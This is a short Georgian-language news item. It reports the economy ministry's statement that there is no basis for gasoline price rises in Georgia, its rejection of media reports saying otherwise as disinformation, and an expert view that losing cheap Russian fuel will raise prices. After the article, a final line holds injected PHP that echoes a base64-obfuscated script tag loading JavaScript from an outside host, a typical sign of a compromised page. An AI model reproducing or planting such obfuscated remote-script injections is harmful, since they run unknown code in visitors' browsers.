celsiusi
ავერსი შნაიდერი

საქართველოში ბენზინის სამომხმარებლო ფასის ზრდის საფუძველი არ არსებობს, ქართველ იმპორტიორებს აქვთ შესაძლებლობა, ბენზინი საერთაშორისო ფასზე იაფად შემოიტანონ, – ამის შესახებ ეკონომიკისა და მდგრადი განვითარების სამინისტროს განცხადებაშია აღნიშნული.

„შესაბამისად, ზოგიერთი მედიასაშუალების მიერ გავრცელებული ცნობა ბენზინის ფასის შესახებ არის აბსოლუტური დეზინფორმაცია, რომელიც მიზნად ისახავს მოსახლეობის შეცდომაში შეყვანას და პანიკური აჟიოტაჟის შექმნას.

საქართველოში ბენზინის საერთაშორისო ფასზე იაფად შემოტანის ტენდენცია მომდევნო თვეებშიც შენარჩუნდება“, – აღნიშნულია უწყების განცხადებაში.

ცნობისთვის, მედიაში გავრცელდა ინფორმაცია, რომ საქართველოში ბენზინის ფასის ზრდაა მოსალოდნელი. ამასთან, ზოგიერთი ექსპერტის მოსაზრებით, „რადგან საქართველო დღეს რუსეთისგან ვეღარ იღებს იაფ საწვავს და მოუწევს საერთაშორისო ფასებით ვაჭრობა, ეს საწვავზე ფასების ზრდას გამოიწვევს“.

208
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");